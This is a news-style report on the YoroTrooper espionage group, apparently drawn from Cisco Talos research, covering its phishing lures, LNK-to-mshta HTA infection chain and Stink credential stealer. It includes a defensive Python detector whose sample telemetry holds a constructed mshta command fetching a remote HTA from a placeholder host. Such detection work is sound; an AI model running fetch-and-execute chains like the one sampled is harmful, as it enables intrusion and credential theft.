Since June 2022, a new threat actor named “YoroTrooper” has been conducting cyberespionage operations against governments and energy companies in CIS nations. According to Cisco Talos, the World Intellectual Property Organization (WIPO), several European embassies, and a crucial European Union body involved in healthcare have all had their accounts hacked.
YoroTrooper’s toolset is a mix of Python-based malware, remote access trojans, and both commodity and customized information stealers. According to Cisco Talos, the group is believed to have stolen a significant amount of data from compromised endpoints, including cookies, browser history, and account credentials.
The infection spreads via phishing emails carrying malicious LNK files and decoy PDF documents. Although YoroTrooper employs malware linked to previous threat actors, such as PoetRAT and LodaRAT, Cisco’s analysts are confident, based on the evidence they have, that this is a new cluster of activity.
YoroTrooper Utilizing Common Malware
In the summer of 2022, YoroTrooper targeted Belarusian entities with malformed PDF files sent from email domains posing as Belarusian or Russian companies. In September 2022 the group experimented with VHDX-based distribution of .NET-based implants and registered a number of typosquatting domains impersonating Russian government entities.
In the months that followed, until the end of the year, the cyberspies turned their attention to Belarus and Azerbaijan, using a custom Python-based implant they called “Stink Stealer.” In 2023, the threat actors attacked the governments of Tajikistan and Uzbekistan, using HTA files to download decoy documents and drop malware on the target’s machine.
In the most recent attacks, phishing emails with malicious RAR or ZIP attachments use lures centered on international relations and national strategy. On the compromised system, the LNK files fetch and run remote HTA files using “mshta.exe”; the HTA downloads a malicious executable that drops the main payload. To avoid suspicion, a decoy document is opened at the same time.
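A defender-side check for the chain described above, written here as an added example (not Talos’s or the threat actor’s code): it scans constructed Sysmon-style process-creation events for mshta.exe launched with a remote URL argument and for any process mshta.exe then spawns. The hostname placeholder.invalid, the file paths, and the event format are all constructed for the example.

```python
"""Flag the LNK -> mshta.exe -> remote HTA -> dropped executable chain in
process-creation telemetry. The event schema is a constructed, simplified
Sysmon-style record; events are assumed to be in chronological order."""
import json
import re

# Constructed sample telemetry: one benign local HTA, one suspicious chain.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Program Files\App\help.hta'},
    {"pid": 5200, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://placeholder.invalid/doc.hta'},
    {"pid": 5300, "ppid": 5200,
     "image": r"C:\Users\victim\AppData\Local\Temp\update.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Users\victim\AppData\Local\Temp\update.exe"'},
]

# mshta.exe normally runs local .hta files; a URL on the command line means
# the script body is fetched from a remote host, as in the chain above.
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

def is_mshta(image):
    return image.lower().endswith(r"\mshta.exe")

def detect_mshta_chain(events):
    """Return alerts for mshta.exe invoked with a remote URL, plus any
    child process of such an mshta.exe (the downloaded/dropped payload)."""
    alerts = []
    suspicious_pids = set()
    for ev in events:
        if is_mshta(ev["image"]):
            m = REMOTE_URL.search(ev["cmdline"])
            if m:
                suspicious_pids.add(ev["pid"])
                alerts.append({"pid": ev["pid"], "rule": "mshta_remote_hta",
                               "url": m.group(0), "parent": ev["parent_image"]})
        elif ev["ppid"] in suspicious_pids:
            # Anything spawned by a flagged mshta.exe is the likely payload.
            alerts.append({"pid": ev["pid"], "rule": "mshta_child_process",
                           "image": ev["image"], "parent_pid": ev["ppid"]})
    return alerts

if __name__ == "__main__":
    print(json.dumps(detect_mshta_chain(SAMPLE_EVENTS), indent=2))
```

The first event (a local help.hta) produces no alert; only the remote fetch and its child are reported.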
YoroTrooper was previously seen using commodity malware such as AveMaria (Warzone RAT) and LodaRAT; in later attacks, the threat actors switched to custom Python RATs compiled with Nuitka. Nuitka makes it possible to deliver the payloads as stand-alone programs without having to install Python on the target device.
The customized RAT facilitates the execution of arbitrary commands on the infected device and uses Telegram for communication with command and control servers and data exfiltration. YoroTrooper used a Python-based stealer script in January 2023 to steal account credentials from Chrome web browsers and send them via a Telegram bot.
In February 2023 the attackers began distributing the “Stink” credential stealer. Stink can take screenshots and steal data from FileZilla, Discord, and Telegram, as well as credentials, bookmarks, and browsing history from Chromium-based browsers. It also enumerates and exfiltrates the hardware, operating system, and running processes.
On the infected machine, all stolen data is first staged in a directory, then compressed and transferred to the threat actors. Stink runs each Python module in its own process and uses multiple threads to speed up data collection.
In addition, YoroTrooper has occasionally deployed C-based keyloggers and Python-based reverse shells. YoroTrooper’s sponsors and affiliations are unclear, and its origin is unknown. However, the espionage group’s use of custom malware tools shows that these are skilled and knowledgeable threat actors.
According to a new study, a new hacker outfit has been conducting espionage against European nations and companies since June 2022. Cisco’s Talos cybersecurity team calls the new gang “YoroTrooper” and says it has already successfully compromised accounts linked to the World Intellectual Property Organization (WIPO) and an “important” healthcare organization in the European Union. The researchers also found that it targeted a number of embassies, and that its victimology consists primarily of nations in the CIS (Commonwealth of Independent States), which includes Azerbaijan, Kyrgyzstan, and Turkmenistan.
According to the researchers, the operators behind this threat actor are likely Russian speakers who do not necessarily live in Russia or hold Russian nationality. Some of their implants contain fragments of Cyrillic, showing that the actor is conversant in the language. The attackers also occasionally aim at Russian-speaking endpoints (those using Code Page 866), which suggests they focus on people who understand that language. The campaign’s aim is espionage, and the hackers spread malware through widely visited CIS entities’ websites or rogue domains of their own. Victims can also be infected by malicious shortcut files and decoy PDF documents delivered in phishing emails.